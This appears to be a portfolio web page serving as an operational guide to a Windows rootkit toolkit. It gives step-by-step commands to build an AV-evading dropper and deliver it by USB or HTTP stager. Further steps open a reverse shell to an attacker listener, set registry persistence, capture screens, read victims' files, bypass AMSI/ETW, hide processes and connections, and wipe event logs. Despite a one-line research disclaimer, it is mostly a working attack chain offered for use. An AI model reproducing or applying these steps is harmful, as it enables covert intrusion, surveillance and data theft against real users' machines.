// INSTALLATION & ATTACK GUIDE

Clone to kill chain. Everything verified against GitHub and local machine.

// PREREQUISITES

RequirementVersionPurpose
Windows 11Build 26200+Target OS (tested on Home edition)
Visual Studio2024/18 CommunityMSVC cl.exe for C compilation
Python3.12+Build scripts, listeners, ghost encoder
GitAnyClone repos, version control
NASM2.15+Assembly stubs for SithStalker gate engines
AUTHORIZED RESEARCH ONLY. Own hardware. Own network. Responsible disclosure via MSRC.

// STEP 1 — CLONE ALL REPOSITORIES

Six repos. Each handles a different layer of the kill chain.

vader-rootkit
Core implant framework — shell, Dark Room, cloak, dropper, injection, persistence, forensics
76 source files • cloak/ dark_room/ injection/ shell/ stagers/ forensics/ recon/ deploy.py
ghost-encoder
Zero-width Unicode steganographic encoder — file-level payload invisibility
ghost_encode.py • ghost_decode.py • ghost_selftest.py
sith-stalker
Indirect syscall engine (Hell's Gate / Halo's Gate) + concealment DLL hooks
src/gate.c gate_v2.c • cloak/hide_process.c hide_file.c hide_connection.c hook_engine.c
skywalker
Cold standby C2 — independent binary signatures, beacon mode, DLL search order exploits
beacon/sw_beacon_live.c sw_listener.py • disclosure/poc_*.c • deploy.py mutate.py
starkiller
Android RAT — C2 server + Kotlin client + obfuscation pipeline + binder
server/starkiller_c2.py • client/app/ (Kotlin) • obfuscate.py binder.py build.py
rainfantry.github.io
Portfolio — all documentation, dossier playbook, build tutorials, this guide
index.html rootkit.html ghost.html dossier.html guide.html + study pages
# Clone all repos (private — requires GitHub auth) $ mkdir 22div && cd 22div $ gh repo clone rainfantry/vader-rootkit $ gh repo clone rainfantry/ghost-encoder $ gh repo clone rainfantry/sith-stalker $ gh repo clone rainfantry/skywalker $ gh repo clone rainfantry/starkiller $ gh repo clone rainfantry/rainfantry.github.io

// STEP 2 — BUILD THE DROPPER

vader_dropper.exe is the single-click kill chain. One compile produces everything.

2A Open Developer Command Prompt

# Open "Developer Command Prompt for VS" from Start menu # OR manually load MSVC environment: > "C:\Program Files\Microsoft Visual Studio\18\Community\VC\Auxiliary\Build\vcvars64.bat"

2B Compile All Binaries

$ cd vader-rootkit $ python cloak/build_cloak.py --scan VADER CLOAK — Build =================== [+] Compiling cloak.dll 105 KB [+] Compiling cloak_loader.exe 143 KB [+] Compiling vader_dropper.exe 268 KB [+] cloak.dll: CLEAN [+] cloak_loader.exe: CLEAN [+] vader_dropper.exe: CLEAN

2C Verify Build Output

$ ls cloak/bin/ cloak.dll 105 KB cloak_loader.exe 143 KB vader_dropper.exe 268 KB # All three should report CLEAN against Defender. # If any flag: run mutate.py to rotate XOR keys and recompile. $ python mutate.py --rotate-keys

// STEP 3 — EXECUTE ATTACK (SINGLE-CLICK METHOD)

Fastest path. One EXE does everything: AMSI bypass, cloak, persistence, C2, screen capture.

3A Start C2 Listener (Attacker Machine)

# Terminal 1 — C2 listener $ cd vader-rootkit $ python cloak/c2_listen.py 53682 [*] VADER C2 — listening on 0.0.0.0:53682 [*] Waiting for connection...

3B Configure C2 Address

# Edit vader_dropper.c line 63-68 — change xC2Addr to your IP # OR pass IP as command line argument when running: > vader_dropper.exe 192.168.1.100 53682
Default C2 is 192.168.1.100:53682. Change xC2Addr XOR bytes for a compiled-in address, or pass IP:PORT as args.

3C Deploy to Target

# USB drop $ copy cloak\bin\vader_dropper.exe E:\ # OR HTTP stager $ python stagers/vader_serve.py --payload cloak/bin/vader_dropper.exe --port 8443 # Target downloads and double-clicks. No warnings. No prompts.

3D Automatic Kill Chain (Runs on Double-Click)

# This happens automatically inside vader_dropper.exe: 1. Sandbox check — RAM > 2GB, CPU > 1, Sleep timing real 2. Dynamic imports — XOR-decode API names, resolve via GetProcAddress 3. Dark Room — DR0 on AmsiScanBuffer, DR1 on EtwEventWrite 4. Cloak deploy — Decrypt cloak.dll, drop to %TEMP%, load, CBT hook 5. Persistence — Self-copy to APPDATA + registry HKCU Run key 6. C2 connect — Reverse TCP to your listener, auto-reconnect 5s 7. Interactive shell — Full command execution + screenshot capability

3E Operate via C2 Shell

# Connection appears in your listener: [+] Connection from 192.168.1.50:49812 [+] Hostname: TARGET-PC | Cloak: ACTIVE C:\Users\target> # Available commands: C:\> screenshot # grab desktop (raw BMP over socket) C:\> dir C:\Users\target\Desktop # browse files C:\> type secrets.txt # read files C:\> systeminfo # system enumeration C:\> whoami /priv # privilege check C:\> cd C:\Users\target\Documents # navigate C:\> exit # disconnect (auto-reconnects)

3F Verify Persistence (Reboot Test)

# From C2 shell — check registry key exists: C:\> reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealthSystray SecurityHealthSystray REG_SZ C:\Users\...\svchost_update.exe # Reboot the target machine. # Watch your listener — connection re-establishes on login. [+] Connection from 192.168.1.50:49920 (reconnected after reboot)

// STEP 4 — ALTERNATIVE: GHOST-ENCODED PAYLOAD

For PowerShell-based delivery. Payload is invisible in the file — zero-width Unicode characters.

# Generate ghost-encoded VADER payload $ cd ghost-encoder $ python ghost_encode.py --vader --ip 192.168.1.100 --port 53682 [+] Generated VADER payload (persistence x3, screen capture, auto-reconnect) [+] Ghost encoded → vader_ghost.ps1 [+] File appears BLANK in Notepad # Deliver via HTA (double-click executes in browser) $ python ghost_encode.py --hta --ip 192.168.1.100 # OR execute directly on target: > powershell -ep bypass -File vader_ghost.ps1
Ghost encoding protects the FILE layer (static scan). Dark Room must be active for RUNTIME protection (AMSI bypass). The vader_dropper.exe method includes both automatically.

// STEP 5 — CLEANUP & MUTATION

# Anti-forensics — from C2 shell on target C:\> vader_clean.exe [*] Phase 1: Wiping persistence artifacts [*] Phase 2: Clearing event logs [*] Phase 3: Removing dropped files [*] Phase 4: Scrubbing prefetch/shimcache [*] Phase 5: Self-delete [+] Clean. # Mutate for next engagement — new signatures $ cd vader-rootkit $ python mutate.py --rotate-keys $ python cloak/build_cloak.py --scan [+] New XOR keys applied. All binaries recompiled. CLEAN.

// FILE MAP — WHAT LIVES WHERE

FileRepoWhat It Does
vader_dropper.cvader-rootkit/cloak/Single-click EXE — AMSI bypass + cloak + persistence + C2 + screencap
build_cloak.pyvader-rootkit/cloak/Compiles dropper + cloak DLL + loader, runs Defender scan
c2_listen.pyvader-rootkit/cloak/C2 listener — receives dropper connections
cloak.c + hide_*.cvader-rootkit/cloak/Concealment DLL — hooks NtQuery* to hide process/files/connections
hook_engine.cvader-rootkit/cloak/Generic x64 inline hooking primitives (12-byte abs JMP + trampoline)
dark_room_annotated.cvader-rootkit/dark_room/AMSI/ETW bypass via HWBP — the technique that MSRC won't fix
vader_shell.cvader-rootkit/shell/Standalone reverse shell (without dropper integration)
vader_inject.cvader-rootkit/injection/Process injector — HWBP all threads, CREATE_SUSPENDED mode
vader_clean_annotated.cvader-rootkit/forensics/Anti-forensics — 5-phase wipe + self-delete
vader_recon.ps1vader-rootkit/recon/Defender reconnaissance scanner
deploy.pyvader-rootkit/Unified deployment script — compile, scan, test, deploy
mutate.pyvader-rootkit/Polymorphic mutation — rotate XOR keys, recompile unique children
ghost_encode.pyghost-encoder/Zero-width Unicode steganographic encoder + VADER payload generator
gate_v2.c + gate_stub_v2.asmsith-stalker/src/Indirect syscall engine — XOR-encrypted hash table + MASM stubs
cloak/*.csith-stalker/cloak/Concealment layer source — BYOVD, DKOM, inline hooks
sw_beacon_live.cskywalker/beacon/Cold standby C2 agent — independent binary signatures
starkiller_c2.pystarkiller/server/Android RAT C2 server + web dashboard

// FAREWELL — KEY KNOWLEDGE FROM THE BUILD

Everything learned building this toolkit. The concepts that matter. The traps to avoid.

THE TWO-LAYER PROTECTION MODEL
There are two fundamentally different problems: hiding payloads from static analysis (AV scanning files on disk) and hiding execution from runtime monitoring (AMSI scanning scripts in memory).
  • Ghost Encoding solves the FILE layer — payloads become invisible zero-width Unicode. No signatures to match. Files appear blank.
  • Dark Room solves the RUNTIME layer — hardware breakpoints on AmsiScanBuffer and EtwEventWrite. CPU debug registers, not memory patches.
  • You need BOTH. Ghost without Dark Room = payload decodes then AMSI catches it. Dark Room without Ghost = Defender catches the file before it runs.
  • vader_dropper.exe combines both automatically.
WHY HARDWARE BREAKPOINTS CAN'T BE FIXED
MSRC acknowledged this as VULN-195458 and won't fix it. Hardware breakpoints use CPU debug registers (DR0-DR3) — they're a CPU feature, not a Windows feature. Defender can't detect them because:
  • No memory is modified. No bytes patched. No VirtualProtect calls.
  • Debug registers are per-thread and only readable via GetThreadContext (which requires THREAD_GET_CONTEXT access to the target thread).
  • The Vectored Exception Handler is a legitimate Windows API. Thousands of applications use VEH for crash handling.
  • The only "fix" would be for Windows to prevent user-mode code from setting its OWN debug registers — which would break every debugger.
GHOST ENCODING IS NOT OBFUSCATION
Obfuscation transforms code to make it harder to understand. Ghost encoding doesn't transform anything — it represents data using characters that have zero visual width. The distinction matters:
  • Obfuscation can be reversed by analysis tools. Ghost encoding can't be "unobfuscated" because it was never obfuscated — the data is literally invisible.
  • AV signature scanners look for byte patterns. Ghost-encoded payloads contain zero known malicious byte sequences — every byte is a Unicode control character.
  • The payload only becomes "real" when decoded at runtime — at which point Dark Room has already blinded AMSI.
  • Ghost encoding is the FILE layer. Not a substitute for runtime protection.
XOR STRING ENCRYPTION — DEFENSE IN DEPTH
Every suspicious string in the dropper (API names, registry paths, filenames, C2 address) is XOR-encrypted in the binary:
  • Key 0xB5 for API function names (WSASocket, SetWindowsHookExA, AmsiScanBuffer)
  • Key 0xBE for operational strings (cmd.exe, C2 IP, registry path, persistence filename)
  • Strings are decoded to stack buffers at runtime, used once, then zeroed with memset()
  • A hex dump of the EXE reveals no suspicious strings — no "cmd.exe", no "HKCU\Software\...", no C2 IP
  • mutate.py rotates these keys and recompiles — every build has unique XOR encoding
THE CONCEALMENT ARCHITECTURE
cloak.dll uses inline hooks on three NT functions to hide from the OS itself:
  • NtQuerySystemInformation — unlinks our process from the SYSTEM_PROCESS_INFORMATION linked list. Task Manager, tasklist, Process Explorer — all blind.
  • NtQueryDirectoryFile — unlinks our files from FILE_BOTH_DIR_INFORMATION. dir, Explorer, any file listing — blind.
  • NtDeviceIoControlFile — filters MIB_TCPROW entries matching our C2 port. netstat, TCPView — blind.
  • SetWindowsHookEx(WH_CBT) spreads cloak.dll system-wide automatically — one command and every GUI process is hooked.
DYNAMIC IMPORTS — STAYING OUT OF THE IAT
The Import Address Table (IAT) is the first thing a static analyzer checks. If your EXE imports WSASocket + SetWindowsHookEx + CreateProcess + AddVectoredExceptionHandler — that's a red flag profile.
  • vader_dropper.exe only shows GetProcAddress, LoadLibraryA, GetModuleHandleA, VirtualAlloc in its IAT — the same as any Windows application.
  • All suspicious APIs are resolved at runtime: XOR-decode the function name → LoadLibrary the DLL → GetProcAddress the function → store in a function pointer.
  • Registry functions (RegOpenKeyEx, RegSetValueEx) and GDI functions (BitBlt, GetDIBits) are left as direct imports — they're not suspicious. Thousands of legitimate apps use them.
WHAT DEFENDER ACTUALLY DETECTS (HONEST TRUTH)
  • Static scan — CLEAN. All 26+ binaries pass MpCmdRun. XOR encoding + dynamic imports + no known signatures = invisible to signature-based detection.
  • AMSI runtime — BYPASSED. Dark Room HWBP. MSRC confirmed won't fix.
  • ETW telemetry — BYPASSED. Same HWBP technique on EtwEventWrite.
  • Behavioral analysis — MINIMAL risk. All API calls are legitimate Windows functions used by thousands of apps. No process hollowing, no APC injection, no NtMapViewOfSection abuse.
  • Enterprise EDR — NOT tested. CrowdStrike, Carbon Black, SentinelOne use kernel-level telemetry (ETW-Ti, minifilters, callback registrations) that user-mode bypasses don't reach. The cloak hides from user-mode queries but kernel drivers can still see the process.
  • Network detection — Raw TCP egress on configurable port. No encryption, no domain fronting, no DNS tunneling. A network IDS watching for unusual outbound connections WILL see it. Future work: TLS wrapping.
ARCHITECTURE DECISIONS THAT MATTERED
  • C over Python for implants. No runtime dependency. No interpreter to detect. 268 KB standalone EXE vs Python requiring a 50MB runtime. C compiles to native code that blends with legitimate Windows binaries.
  • WinMain over main. /SUBSYSTEM:WINDOWS means no console window flashes when the dropper runs. Completely silent execution.
  • Embedded DLL over separate file. cloak.dll is XOR-encrypted inside vader_dropper.exe. One file to deploy, not two. Decrypted at runtime and written to %TEMP% — then deleted on exit.
  • Registry Run over Scheduled Tasks. HKCU Run key doesn't require admin. Scheduled tasks via COM are complex and create more forensic artifacts. Simple wins.
  • Raw BMP over JPEG for screenshots. No GDI+ dependency needed. Larger data (5.9 MB vs 200 KB) but simpler code and zero additional DLLs. The C2 listener can convert to JPEG.
  • Auto-reconnect with infinite retries. MAX_RETRIES = 0 means the dropper never gives up. Listener goes down, comes back up — dropper reconnects. Persistence through network disruptions.
// END OF TRANSMISSION
Six repositories. 76+ source files. 26 compiled binaries. Zero detections.
One MSRC disclosure. One kill chain. One single-click dropper.

Every layer exists for a reason. Every design decision has a "why."
The dossier is the playbook. This guide is the manual. The code is the proof.

From steganography to rootkit — the full chain, documented and operational.

22DIV / VADER / george wu

// QUICK LINKS

PageWhat
Landing PageOperations order + 8-phase learning path
Dossier / PlaybookOperational kill chain + build-from-scratch tutorial + 7-day reading order
VADER Deep DiveFull technical breakdown of the rootkit framework
Ghost EncoderZero-width steganography showcase + detection profile
Sith StalkerIndirect syscall engine documentation
SkywalkerCold standby C2 + DLL search order exploits
StarKillerAndroid RAT documentation
Kill Chain StudiesCSEC cybersecurity coursework + Cyber Kill Chain mapping